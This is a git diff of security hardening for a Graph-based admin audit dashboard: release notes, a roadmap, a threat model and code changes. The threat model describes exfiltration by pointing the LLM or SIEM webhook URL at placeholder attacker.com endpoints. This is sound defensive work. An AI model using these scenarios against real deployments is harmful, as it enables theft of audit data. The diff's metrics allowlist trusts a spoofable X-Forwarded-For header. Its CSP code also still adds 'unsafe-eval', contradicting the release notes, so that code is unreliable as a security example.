+This release removes `unsafe-eval` from the Content-Security-Policy by switching the frontend to Alpine.js's CSP-compatible build.
+
+### Changes
+
+- **Frontend:** Switched from `alpinejs@3.x.x/dist/cdn.min.js` to `alpinejs@3.x.x/dist/csp.min.js`
+- **Frontend:** Added explicit `Alpine.start()` call on `DOMContentLoaded` (required by CSP build)
+- **Backend CSP:** Removed `'unsafe-eval'` from `script-src` directive
+
+### Why this matters
+
+The previous v1.7.11–1.7.12 releases included `'unsafe-eval'` in the CSP because the standard Alpine.js CDN build uses `new Function()` internally for reactive expression evaluation. The CSP build eliminates this requirement, further hardening the application against XSS and injection attacks.
+
+### Compatibility
+
+All existing Alpine.js directives (`x-data`, `x-init`, `x-show`, `x-text`, `x-for`, `x-if`, `x-model`, event handlers) continue to work unchanged. The CSP build uses a safe expression evaluator that produces identical behavior without `eval`/`new Function`.
+
+## Files Changed
+
+| File | Change |
+|------|--------|
+| `backend/frontend/index.html` | Alpine.js src → `csp.min.js`; added `Alpine.start()` |
+| `backend/main.py` | Removed `'unsafe-eval'` from `script-src` CSP |
+| `VERSION` | Bumped to 1.7.13 |
+
+## Test Results
+
+- **80/80 pytest tests passing**
+- Ruff lint/format clean
--- a/RELEASE_NOTES_v1.7.14.md
+++ b/RELEASE_NOTES_v1.7.14.md
@@ -0,0 +1,64 @@
+# AOC v1.7.14 Release Notes
+
+**Release Date:** 2026-04-27
+
+## Security Hardening: Threat Model Remediation
+
+This release addresses the high-severity findings from the v1.7.13 threat model review.
+
+### LLM Endpoint Domain Allowlist
+
+- **New config:** `LLM_ALLOWED_DOMAINS` (comma-separated, supports wildcards like `*.openai.azure.com`)
+- **Behavior:** When configured, the `/api/ask` endpoint rejects `LLM_BASE_URL` domains not in the allowlist
+- **Impact:** Prevents audit data exfiltration via a compromised or attacker-controlled LLM endpoint
+
+### SIEM Webhook SSRF Guard
+
+- **New config:** `SIEM_ALLOWED_DOMAINS` (comma-separated)
+- **Behavior:** The SIEM forwarder now validates `SIEM_WEBHOOK_URL` with the same SSRF checks as the LLM endpoint (HTTPS-only, blocks private IPs, enforces domain allowlist)
+- **Impact:** Prevents real-time audit data exfiltration via a malicious SIEM webhook URL
+
+### CDN Subresource Integrity (SRI)
+
+- Added `integrity` hashes to both CDN scripts in the frontend:
+  - Alpine.js 3.15.11: `sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be`
+  - MSAL.js 2.37.0: `sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW`
+- **Impact:** Browser refuses to execute CDN scripts if the content doesn't match the hash, preventing supply chain compromise
+
+### Auth Misconfiguration Warning
+
+- At startup, AOC now logs a `WARNING` if `AUTH_ENABLED=true` but neither `AUTH_ALLOWED_ROLES` nor `AUTH_ALLOWED_GROUPS` is configured
+- **Impact:** Operators are alerted when the app is accidentally left open to all Entra users
+
+### Azure Key Vault Integration (Optional)
+
+- **New module:** `backend/secrets_manager.py`
+- **New config:** `AZURE_KEY_VAULT_NAME`
+- **Behavior:** If `AZURE_KEY_VAULT_NAME` is set, AOC fetches these secrets from Key Vault at startup:
+  - `aoc-client-secret` → `CLIENT_SECRET`
+  - `aoc-llm-api-key` → `LLM_API_KEY`
+  - `aoc-mongo-uri` → `MONGO_URI`
+  - `aoc-webhook-client-secret` → `WEBHOOK_CLIENT_SECRET`
+- Falls back silently to `.env` / environment variables when Key Vault is not configured
+- **Dependencies:** `azure-identity` and `azure-keyvault-secrets` (commented out in `requirements.txt` — uncomment when using Key Vault)
+- **Impact:** Eliminates long-lived secrets from `.env` files and Docker images
+
+## Files Changed
+
+| File | Change |
+|------|--------|
+| `backend/config.py` | Added `LLM_ALLOWED_DOMAINS`, `SIEM_ALLOWED_DOMAINS`, `AZURE_KEY_VAULT_NAME` |
+| `backend/routes/ask.py` | Domain allowlist enforcement for LLM URL |
+| `backend/siem.py` | SSRF guard + domain allowlist for SIEM webhook |
+| `backend/frontend/index.html` | SRI hashes for Alpine.js and MSAL.js |
+| `backend/main.py` | Startup warning for auth misconfiguration |
+| `backend/secrets_manager.py` | New — Azure Key Vault integration |
+| `backend/requirements.txt` | Added optional Azure Key Vault packages |
+| `.env.example` | Documented new settings |
+| `VERSION` | Bumped to 1.7.14 |
+| `THREAT_MODEL_v1.7.13.md` | Threat model documentation |
+
+## Test Results
+
+- **80/80 pytest tests passing**
+- Ruff lint/format clean
--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -59,7 +59,7 @@ Goal: evolve from a polling dashboard into a full security operations tool.

 ---

-## Phase 5: Intelligence
+## Phase 5: Intelligence ✅
 Goal: add AI-powered analysis and external tool integration.

 - [x] AI feature flag (`AI_FEATURES_ENABLED`) to gate LLM-dependent features
@@ -76,7 +76,26 @@ UI polish (topbar, footer, clickable pills) in v1.6.1–v1.6.4.

 ---

-## Phase 6: Multi-Tenancy (Premium) ⏸️
+## Phase 6: Security Hardening ✅
+Goal: address penetration test findings and threat model gaps.
+
+- [x] Fix CORS credentials leak (v1.7.12)
+- [x] Add security headers (X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) (v1.7.12)
+- [x] Make rate limiter fail-closed on Redis failure (v1.7.12)
+- [x] Disable OpenAPI docs by default (v1.7.12)
+- [x] Hide tenant_id/client_id from config endpoint when auth disabled (v1.7.12)
+- [x] Validate webhook validationToken before echo (v1.7.12)
+- [x] Gate `/metrics` behind IP allowlist (v1.7.12)
+- [x] Add LLM domain allowlist (`LLM_ALLOWED_DOMAINS`) (v1.7.14)
+- [x] Add SIEM webhook SSRF guard + domain allowlist (v1.7.14)
+- [x] Add SRI hashes to CDN scripts (v1.7.14)
+- [x] Add startup warning for auth misconfiguration (v1.7.14)
+- [x] Add Azure Key Vault integration for secrets storage (v1.7.14)
+- [x] Internal penetration test + threat model documentation
+
+---
+
+## Phase 7: Multi-Tenancy (Premium) ⏸️
 Goal: allow MSPs to manage multiple client tenants from a single deployment.

 Status: **Planned — not started**. Architecture designed, pending validation of core features (SIEM export, alerting) in production first.
@@ -88,10 +107,10 @@ Status: **Planned — not started**. Architecture designed, pending validation o
 - Super-admin role for MSP staff to access all tenants

 ### Implementation phases
- **Phase 6.1** (2–3 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth
- **Phase 6.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints
- **Phase 6.3** (2 days): Frontend tenant switcher, tenant name display, admin page
- **Phase 6.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode
+- **Phase 7.1** (2–3 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth
+- **Phase 7.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints
+- **Phase 7.3** (2 days): Frontend tenant switcher, tenant name display, admin page
+- **Phase 7.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode

 ### Licensing model
 - Single-tenant: remains MIT/free
--- a/THREAT_MODEL_v1.7.13.md
+++ b/THREAT_MODEL_v1.7.13.md
@@ -0,0 +1,321 @@
+# AOC Threat Model — v1.7.13
+
+**Date:** 2026-04-27
+**Scope:** Entra ID / Microsoft Graph integration, token handling, data flows, external dependencies
+**Assumptions:** Deployment is Docker Compose behind nginx reverse proxy; `AUTH_ENABLED=true`; `AI_FEATURES_ENABLED` may be true or false.
+
+---
+
+## Attack Surface Map
+
+```
+┌─────────────────────────────────────────────────────────────────────────────┐
+│                              ATTACKER                                        │
+│         │                    │                    │                          │
+│         ▼                    ▼                    ▼                          │
+│  ┌─────────────┐    ┌──────────────┐    ┌─────────────────┐                 │
+│  │  Frontend   │    │   API        │    │  Webhook        │                 │
+│  │  (CDN JS)   │    │  (/api/*)    │    │  (/api/webhooks)│                 │
+│  └──────┬──────┘    └──────┬───────┘    └────────┬────────┘                 │
+│         │                  │                      │                          │
+│         ▼                  ▼                      ▼                          │
+│  ┌─────────────────────────────────────────────────────────────┐            │
+│  │                    AOC BACKEND                               │            │
+│  │  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐    │            │
+│  │  │  Auth    │  │  Events  │  │  Fetch   │  │  Ask/LLM │    │            │
+│  │  │  (JWT)   │  │  (Mongo) │  │  (Graph) │  │  (HTTP)  │    │            │
+│  │  └────┬─────┘  └────┬─────┘  └────┬─────┘  └────┬─────┘    │            │
+│  │       │             │             │             │           │            │
+│  │       ▼             ▼             ▼             ▼           │            │
+│  │  ┌─────────────────────────────────────────────────────┐    │            │
+│  │  │              SECRETS / CREDENTIALS                   │    │            │
+│  │  │  CLIENT_SECRET  │  LLM_API_KEY  │  MONGO_PASSWORD   │    │            │
+│  │  └─────────────────────────────────────────────────────┘    │            │
+│  └─────────────────────────────────────────────────────────────┘            │
+│         │                  │                      │                          │
+│         ▼                  ▼                      ▼                          │
+│  ┌─────────────┐    ┌──────────────┐    ┌─────────────────┐                 │
+│  │ Microsoft   │    │  LLM API     │    │  SIEM Webhook   │                 │
+│  │  Graph API  │    │  (OpenAI/    │    │  (optional)     │                 │
+│  │             │    │   Azure)     │    │                 │                 │
+│  └─────────────┘    └──────────────┘    └─────────────────┘                 │
+└─────────────────────────────────────────────────────────────────────────────┘
+```
+
+---
+
+## 1. Entra App Registration Abuse — HIGH
+
+### 1.1 Client Credentials Leak = Full Tenant Read
+
+**How it works:**
+- AOC uses `client_credentials` flow (`graph/auth.py`)
+- `CLIENT_ID` + `CLIENT_SECRET` are exchanged for an access token at `login.microsoftonline.com`
+- The token has `https://graph.microsoft.com/.default` scope
+- This grants **all application permissions** configured in the Entra app registration
+
+**Typical permissions:**
+- `Directory.Read.All` — read all users, groups, devices, roles
+- `AuditLog.Read.All` — read all audit logs
+- `DeviceManagementManagedDevices.Read.All` — read all Intune devices
+
+**Attack scenario:**
+1. Attacker gains read access to `.env` or the Docker container filesystem
+2. Attacker calls the token endpoint directly with the leaked `CLIENT_ID`/`CLIENT_SECRET`
+3. Attacker receives a Graph API access token valid for ~1 hour
+4. Attacker can query ALL tenant data independently of AOC
+
+**Impact:** Complete tenant data exfiltration — users, groups, devices, audit logs, mailboxes (if `Exchange.Read` granted).
+
+**Mitigation in place:** None. The backend needs these permissions to function.
+
+**Recommendation:**
+- Store `CLIENT_SECRET` in a secret manager (Azure Key Vault, HashiCorp Vault) rather than `.env`
+- Use short-lived certificates instead of long-lived secrets for app authentication
+- Monitor Entra sign-in logs for anomalous `client_credentials` token requests
+- Restrict app registration permissions to the absolute minimum (e.g., `AuditLog.Read.All` + `Directory.Read.All` only)
+
+---
+
+### 1.2 No Scope Restriction on Graph Token
+
+**Finding:** `get_access_token()` always requests `https://graph.microsoft.com/.default` — the full permission set. There's no mechanism to request narrower scopes for specific operations.
+
+**Impact:** If the app registration has 10 permissions, every token has all 10. A bug in one code path could expose data from all 10 permission areas.
+
+**Recommendation:** Not easily fixable without splitting into multiple app registrations. Document as accepted risk.
+
+---
+
+## 2. Authentication & Token Validation — MEDIUM
+
+### 2.1 JWKS Fetch Without TLS Certificate Validation Hardening
+
+**Finding:** `_get_jwks()` fetches OIDC configuration and JWKS from `login.microsoftonline.com` using standard `requests` TLS validation. No certificate pinning or CA bundle restriction.
+
+**Attack scenario (advanced):**
+1. Attacker compromises DNS or a network hop between AOC and Microsoft
+2. Attacker serves a fake JWKS endpoint with their own public key
+3. Attacker issues a forged JWT signed with their private key
+4. AOC validates the forged JWT against the attacker's public key
+5. Attacker gains authenticated access
+
+**Likelihood:** Very low (requires DNS compromise or nation-state-level interception).
+
+**Mitigation:** Standard TLS validation is in place. For high-security environments, consider pinning the `login.microsoftonline.com` certificate thumbprint.
+
+---
+
+### 2.2 Missing `nbf` / `iat` Claim Verification
+
+**Finding:** `_decode_token()` verifies `exp`, `tid`, `iss`, and `aud` but does not check `nbf` (not before) or `iat` (issued at) claims.
+
+**Impact:** A token used before its validity period (`nbf`) or with a suspicious future `iat` would be accepted. Minor issue — MSAL tokens are well-formed in practice.
+
+---
+
+### 2.3 Role/Group Gating Defaults to "Allow All"
+
+**Finding:** In `auth.py`:
+```python
+def _allowed(claims, allowed_roles, allowed_groups):
+    if not allowed_roles and not allowed_groups:
+        return True
+```
+
+**Impact:** If `AUTH_ENABLED=true` but `AUTH_ALLOWED_ROLES` and `AUTH_ALLOWED_GROUPS` are left empty (the default), **every Entra user in the tenant** can authenticate and use AOC. This is a common misconfiguration.
+
+**Recommendation:** Add a startup warning when auth is enabled but no roles/groups are configured. Consider changing the default to deny-all.
+
+---
+
+### 2.4 Privacy Service Role Gating Also Defaults to "Allow All"
+
+**Finding:** `user_can_access_privacy_services()` returns `True` if `PRIVACY_SERVICE_ROLES` is empty. If an admin configures `PRIVACY_SERVICES` (e.g., `Exchange`) but forgets to set `PRIVACY_SERVICE_ROLES`, all users see all privacy data.
+
+---
+
+## 3. Data Exfiltration Paths — HIGH
+
+### 3.1 LLM Endpoint as Data Exfiltration Channel
+
+**Finding:** When `AI_FEATURES_ENABLED=true` and `LLM_API_KEY` is set:
+- The `/api/ask` endpoint sends audit event data (actors, targets, operations, summaries) to the configured LLM API
+- `_validate_llm_url()` blocks private IPs but does NOT restrict the domain to an allowlist
+- Any HTTPS URL is accepted
+
+**Attack scenario:**
+1. Attacker gains `.env` write access (or container filesystem access)
+2. Attacker changes `LLM_BASE_URL` to `https://attacker.com/fake-llm`
+3. Attacker sends an `/api/ask` request like "show me all events"
+4. AOC queries MongoDB and sends up to `LLM_MAX_EVENTS` (default 200) events to the attacker's URL
+5. Attacker receives structured audit data including actor names, UPNs, device names, operation details
+
+**Impact:** Up to 200 audit events exfiltrated per API call. With pagination, an attacker could exfiltrate the entire database.
+
+**Mitigation in place:** SSRF guard blocks private IPs and localhost.
+
+**Gap:** No domain allowlist. An attacker-controlled public HTTPS endpoint is accepted.
+
+**Recommendation:**
+- Add `LLM_ALLOWED_DOMAINS` config (e.g., `api.openai.com,*.openai.azure.com`)
+- Validate `LLM_BASE_URL` against this allowlist at startup and on every request
+- Log all LLM requests with event counts sent
+
+---
+
+### 3.2 SIEM Webhook as Real-Time Exfiltration Channel
+
+**Finding:** `siem.py` forwards every normalized event to `SIEM_WEBHOOK_URL` during ingestion:
+```python
+def forward_event(event):
+    if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
+        return
+    requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
+```
+
+**Gap:** No URL validation at all. Unlike the LLM endpoint, the SIEM webhook has NO SSRF guard.
+
+**Attack scenario:**
+1. Attacker sets `SIEM_ENABLED=true` and `SIEM_WEBHOOK_URL=https://attacker.com/collect`
+2. Every new audit event fetched from Graph is immediately POSTed to the attacker's URL
+3. Attacker receives real-time stream of all tenant audit events
+
+**Impact:** Real-time, continuous data exfiltration of all audit events.
+
+**Recommendation:**
+- Add the same SSRF validation to `SIEM_WEBHOOK_URL` that exists for `LLM_BASE_URL`
+- Add `SIEM_ALLOWED_DOMAINS` config
+- Log SIEM forwarding failures prominently
+
+---
+
+### 3.3 Export Features (JSON/CSV)
+
+**Finding:** The frontend has `exportJSON()` and `exportCSV()` functions that download all currently filtered events. These are authenticated but not rate-limited separately from `/api/events`.
+
+**Impact:** A compromised account can export large batches of events. However, this requires authentication and is bounded by the 500-event page size limit.
+
+**Risk level:** LOW — requires valid auth and is noisy.
+
+---
+
+## 4. Webhook Abuse — MEDIUM
+
+### 4.1 Graph Change Notification Webhook
+
+**Finding:** `/api/webhooks/graph` receives Microsoft Graph change notifications:
+- Echoes `validationToken` for subscription handshake
+- Accepts notifications with optional `clientState` validation
+- `WEBHOOK_CLIENT_SECRET` is empty by default
+
+**Attack scenario 1 — Subscription hijacking:**
+1. Attacker discovers the webhook URL (via API enumeration or guess)
+2. Attacker creates a Graph subscription pointing to the AOC webhook URL
+3. Attacker receives change notifications for the subscribed resource
+
+**Mitigation:** Notifications without matching `clientState` are rejected when `WEBHOOK_CLIENT_SECRET` is configured. But it's empty by default.
+
+**Attack scenario 2 — Validation token abuse:**
+1. Attacker sends a POST to `/api/webhooks/graph?validationToken=<arbitrary content>`
+2. AOC echoes the token back as `text/plain`
+3. Could be used for cache poisoning or response splitting
+
+**Mitigation:** Length and ASCII validation added in v1.7.12.
+
+**Recommendation:**
+- Require `WEBHOOK_CLIENT_SECRET` to be set in production
+- Document that the webhook endpoint should NOT be exposed to the public internet
+
+---
+
+## 5. Supply Chain — MEDIUM
+
+### 5.1 CDN Scripts Without Subresource Integrity (SRI)
+
+**Finding:** The frontend loads two external scripts without SRI hashes:
+```html
+<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
+<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
+```
+
+**Attack scenario:**
+1. `cdn.jsdelivr.net` or `alcdn.msauth.net` is compromised (supply chain attack)
+2. Malicious JavaScript is served instead of the legitimate library
+3. Malicious script can steal MSAL tokens, modify API requests, or exfiltrate data
+
+**Impact:** Complete frontend compromise — token theft, data exfiltration, UI spoofing.
+
+**Recommendation:**
+- Add SRI hashes to both script tags:
+  ```html
+  <script defer src="..." integrity="sha384-..." crossorigin="anonymous"></script>
+  ```
+- Or vendor the JS files and serve them from the same origin
+
+---
+
+## 6. Privilege Escalation — MEDIUM
+
+### 6.1 Application Permissions Bypass User Boundaries
+
+**Finding:** Because AOC uses application permissions (not delegated permissions), the backend can read audit logs for ALL users, not just the authenticated user. The privacy service filtering (`PRIVACY_SERVICES`) is the only boundary — and it's opt-in.
+
+**Impact:** A user with minimal Entra permissions (e.g., a regular user who can authenticate) can view audit logs for the entire tenant if:
+- `PRIVACY_SERVICES` is not configured, OR
+- `PRIVACY_SERVICE_ROLES` is not configured
+
+**Recommendation:**
+- Document that AOC should be restricted to admin/security roles via `AUTH_ALLOWED_ROLES`
+- Consider adding per-user event filtering (only show events where the authenticated user is the actor or target)
+
+---
+
+## 7. Miscellaneous Vectors — LOW
+
+### 7.1 Token Cache in Memory
+
+**Finding:** `_TOKEN_CACHE` in `graph/auth.py` is an in-memory dictionary. If an attacker gains code execution in the Python process, they can read the cache or call `get_access_token()` directly.
+
+**Impact:** Attacker with code execution can get Graph API tokens. But if they have code execution, they already have `CLIENT_SECRET` from memory or `.env`.
+
+### 7.2 MongoDB Connection String
+
+**Finding:** `MONGO_URI` contains credentials. If an attacker gains filesystem access, they can connect directly to MongoDB and bypass all AOC auth/privacy controls.
+
+**Mitigation:** MongoDB is internal to Docker network (not exposed to host in production compose file).
+
+### 7.3 Audit Trail Log Injection
+
+**Finding:** `audit_trail.log_action()` stores actions in MongoDB. The `details` dict could contain user-controlled data (e.g., filter values). If the audit log is ever rendered without escaping, this could lead to XSS.
+
+**Risk level:** LOW — audit logs are not currently rendered in the UI.
+
+---
+
+## Risk Summary
+
+| Vector | Severity | Likelihood | Requires |
+|--------|----------|------------|----------|
+| Client secret leak → full tenant read | **HIGH** | Medium | `.env` or container access |
+| LLM endpoint hijacking → data exfil | **HIGH** | Low | `.env` write access |
+| SIEM webhook hijacking → real-time exfil | **HIGH** | Low | `.env` write access |
+| CDN compromise → frontend token theft | **MEDIUM** | Low | Supply chain attack |
+| Role gating misconfig → all users access | **MEDIUM** | High | Misconfiguration |
+| Webhook subscription hijacking | **MEDIUM** | Low | URL discovery |
+| DNS compromise → fake JWKS | **MEDIUM** | Very low | Network compromise |
+| Application permissions bypass boundaries | **MEDIUM** | High | Default config |
+| Token replay | LOW | Low | Token theft |
+| Audit log injection | LOW | Low | Filter manipulation |
+
+---
+
+## Immediate Recommendations
+
+1. **Add LLM domain allowlist** (`LLM_ALLOWED_DOMAINS`) and validate at startup
+2. **Add SIEM SSRF guard** — reuse `_validate_llm_url()` for `SIEM_WEBHOOK_URL`
+3. **Add SRI hashes** to CDN script tags, or vendor the libraries
+4. **Add startup warning** when auth is enabled but no `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` configured
+5. **Document webhook security** — require `WEBHOOK_CLIENT_SECRET` in production
+6. **Consider Key Vault integration** for `CLIENT_SECRET` and `LLM_API_KEY`
+7. **Add per-user filtering option** — restrict events to those involving the authenticated user
--- a/2
+++ b/2
@@ -1 +1 @@
-1.7.7
+1.7.14
--- a/backend/config.py
+++ b/backend/config.py
@@ -1,4 +1,10 @@
-from pydantic_settings import BaseSettings, SettingsConfigDict
+from secrets_manager import load_key_vault_secrets
+
+# Pre-load Azure Key Vault secrets into os.environ before pydantic-settings reads them.
+# This is a no-op if AZURE_KEY_VAULT_NAME is not set.
+load_key_vault_secrets()
+
+from pydantic_settings import BaseSettings, SettingsConfigDict  # noqa: E402


 class Settings(BaseSettings):
@@ -76,6 +82,19 @@ class Settings(BaseSettings):
    RATE_LIMIT_REQUESTS: int = 120
    RATE_LIMIT_WINDOW_SECONDS: int = 60

+    # Security / docs exposure
+    DOCS_ENABLED: bool = False
+    METRICS_ALLOWED_IPS: str = "127.0.0.1,::1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16"
+
+    # LLM endpoint restriction (comma-separated domains, e.g. "api.openai.com,*.openai.azure.com")
+    LLM_ALLOWED_DOMAINS: str = ""
+
+    # SIEM webhook restriction (comma-separated domains)
+    SIEM_ALLOWED_DOMAINS: str = ""
+
+    # Optional Azure Key Vault integration for secrets
+    AZURE_KEY_VAULT_NAME: str = ""
+

 _settings = Settings()

@@ -127,3 +146,11 @@ WEBHOOK_CLIENT_SECRET = _settings.WEBHOOK_CLIENT_SECRET
 RATE_LIMIT_ENABLED = _settings.RATE_LIMIT_ENABLED
 RATE_LIMIT_REQUESTS = _settings.RATE_LIMIT_REQUESTS
 RATE_LIMIT_WINDOW_SECONDS = _settings.RATE_LIMIT_WINDOW_SECONDS
+
+DOCS_ENABLED = _settings.DOCS_ENABLED
+METRICS_ALLOWED_IPS = _settings.METRICS_ALLOWED_IPS
+
+LLM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.LLM_ALLOWED_DOMAINS.split(",") if d.strip()]
+SIEM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.SIEM_ALLOWED_DOMAINS.split(",") if d.strip()]
+
+AZURE_KEY_VAULT_NAME = _settings.AZURE_KEY_VAULT_NAME
--- a/backend/frontend/index.html
+++ b/backend/frontend/index.html
@@ -5,8 +5,8 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Admin Operations Center</title>
  <link rel="stylesheet" href="/style.css?v=15" />
-  <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
-  <script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
+  <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js" integrity="sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be" crossorigin="anonymous"></script>
+  <script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" integrity="sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW" crossorigin="anonymous"></script>
 </head>
 <body>
  <div class="page" x-data="aocApp()" x-init="initApp()">
@@ -591,9 +591,15 @@
        async initAuth() {
          try {
            const res = await fetch('/api/config/auth');
+            if (!res.ok) {
+              console.error('Auth config fetch failed:', res.status, res.statusText);
+              this.authConfig = { auth_enabled: false, _error: res.status };
+            } else {
              this.authConfig = await res.json();
-          } catch {
-            this.authConfig = { auth_enabled: false };
+            }
+          } catch (err) {
+            console.error('Auth config fetch error:', err);
+            this.authConfig = { auth_enabled: false, _error: 'network' };
          }

          try {
@@ -614,7 +620,17 @@
          }

          if (!this.authConfig?.auth_enabled) {
-            this.authBtnText = '';
+            this.authBtnText = 'Auth: OFF';
+            console.warn('AOC auth is disabled. Set AUTH_ENABLED=true in .env to enable login.');
+            return;
+          }
+
+          const tenantId = this.authConfig.tenant_id;
+          const clientId = this.authConfig.client_id;
+          if (!clientId || !tenantId) {
+            this.authBtnText = 'Auth: misconfigured';
+            this.statusText = 'Auth is enabled but client_id or tenant_id is missing. Check .env configuration.';
+            console.error('AOC auth misconfigured: missing client_id or tenant_id in /api/config/auth');
            return;
          }

@@ -623,8 +639,6 @@
            return;
          }

-          const tenantId = this.authConfig.tenant_id;
-          const clientId = this.authConfig.client_id;
          const baseScope = this.authConfig.scope || "";
          this.authScopes = Array.from(new Set(['openid', 'profile', 'email', ...baseScope.split(/[ ,]+/).filter(Boolean)]));
          const authority = `https://login.microsoftonline.com/${tenantId}`;
@@ -1260,5 +1274,6 @@
      };
    }
  </script>
+
 </body>
 </html>
--- a/backend/main.py
+++ b/backend/main.py
@@ -1,12 +1,24 @@
 import asyncio
+import ipaddress
 import logging
+import os
 import time
 from contextlib import suppress
 from pathlib import Path

 import structlog
 from audit_trail import log_action
-from config import AI_FEATURES_ENABLED, AUTH_ENABLED, CORS_ORIGINS, ENABLE_PERIODIC_FETCH, FETCH_INTERVAL_MINUTES
+from config import (
+    AI_FEATURES_ENABLED,
+    AUTH_ALLOWED_GROUPS,
+    AUTH_ALLOWED_ROLES,
+    AUTH_ENABLED,
+    CORS_ORIGINS,
+    DOCS_ENABLED,
+    ENABLE_PERIODIC_FETCH,
+    FETCH_INTERVAL_MINUTES,
+    METRICS_ALLOWED_IPS,
+)
 from database import setup_indexes
 from fastapi import FastAPI, HTTPException, Request
 from fastapi.middleware.cors import CORSMiddleware
@@ -50,22 +62,28 @@ def configure_logging():
 configure_logging()
 logger = structlog.get_logger("aoc.fetcher")

-app = FastAPI()
+# Disable OpenAPI docs in production by default
+app = FastAPI(
+    docs_url="/docs" if DOCS_ENABLED else None,
+    redoc_url="/redoc" if DOCS_ENABLED else None,
+    openapi_url="/openapi.json" if DOCS_ENABLED else None,
+)

-# CORS: reject wildcard in production when auth is enabled
+# CORS: when auth is enabled, never allow credentials with wildcard origins
 _effective_cors = CORS_ORIGINS
+_cors_credentials = True
 if AUTH_ENABLED and "*" in _effective_cors:
    logger.warning(
-        "CORS wildcard (*) is insecure when AUTH_ENABLED=true. "
-        "Removing wildcard. Set CORS_ORIGINS explicitly in production."
+        "CORS wildcard (*) is insecure with AUTH_ENABLED=true and allow_credentials. "
+        "Disabling credentials. Set CORS_ORIGINS to your actual origin(s)."
    )
-    _effective_cors = [o for o in _effective_cors if o != "*"] or ["http://localhost:8000"]
+    _cors_credentials = False

 app.add_middleware(CorrelationIdMiddleware)
 app.add_middleware(
    CORSMiddleware,
    allow_origins=_effective_cors,
-    allow_credentials=True,
+    allow_credentials=_cors_credentials,
    allow_methods=["*"],
    allow_headers=["*"],
 )
@@ -82,21 +100,31 @@ async def prometheus_middleware(request: Request, call_next):


@app.middleware("http")
-async def cache_control_middleware(request: Request, call_next):
+async def security_headers_middleware(request: Request, call_next):
    response = await call_next(request)
    # Prevent caching of HTML and API responses by default
    if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
        response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
        response.headers["Pragma"] = "no-cache"
        response.headers["Expires"] = "0"
-    # Basic CSP for the UI and API
+    # Basic CSP for the UI and API (allows MSAL auth flows)
    if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
        response.headers["Content-Security-Policy"] = (
            "default-src 'self'; "
-            "script-src 'self' 'unsafe-inline' cdn.jsdelivr.net alcdn.msauth.net; "
+            "script-src 'self' 'unsafe-inline' 'unsafe-eval' cdn.jsdelivr.net alcdn.msauth.net; "
            "style-src 'self' 'unsafe-inline'; "
-            "connect-src 'self'; "
+            "connect-src 'self' https://login.microsoftonline.com; "
+            "frame-src 'self' https://login.microsoftonline.com; "
+            "form-action 'self' https://login.microsoftonline.com; "
            "img-src 'self' data:; "
+            "font-src 'self' data:;"
+        )
+    # Additional security headers
+    response.headers["X-Content-Type-Options"] = "nosniff"
+    response.headers["X-Frame-Options"] = "DENY"
+    response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
+    response.headers["Permissions-Policy"] = (
+        "accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()"
    )
    return response

@@ -104,7 +132,9 @@ async def cache_control_middleware(request: Request, call_next):
@app.middleware("http")
 async def rate_limit_middleware(request: Request, call_next):
    """Apply Redis-backed rate limiting before processing the request."""
-    if request.url.path.startswith("/api/"):
+    # Exempt config and health endpoints from rate limiting
+    exempt_paths = {"/api/config/auth", "/api/config/features", "/health", "/metrics"}
+    if request.url.path.startswith("/api/") and request.url.path not in exempt_paths:
        from rate_limiter import check_rate_limit

        await check_rate_limit(request)
@@ -161,15 +191,44 @@ async def health_check():
        raise HTTPException(status_code=503, detail="Database unavailable") from exc


+def _client_ip(request: Request) -> str:
+    """Best-effort client IP: X-Forwarded-For first hop, or direct client host."""
+    forwarded = request.headers.get("x-forwarded-for")
+    if forwarded:
+        return forwarded.split(",")[0].strip()
+    return request.client.host if request.client else ""
+
+
+def _is_metrics_allowed(ip: str) -> bool:
+    """Check if IP is in the configured metrics allowlist."""
+    if not METRICS_ALLOWED_IPS:
+        return True
+    try:
+        client_addr = ipaddress.ip_address(ip)
+    except ValueError:
+        return False
+    for network in METRICS_ALLOWED_IPS.split(","):
+        network = network.strip()
+        if not network:
+            continue
+        try:
+            if client_addr in ipaddress.ip_network(network, strict=False):
+                return True
+        except ValueError:
+            continue
+    return False
+
+
@app.get("/metrics")
-async def metrics():
+async def metrics(request: Request):
+    client_ip = _client_ip(request)
+    if not _is_metrics_allowed(client_ip):
+        raise HTTPException(status_code=403, detail="Forbidden")
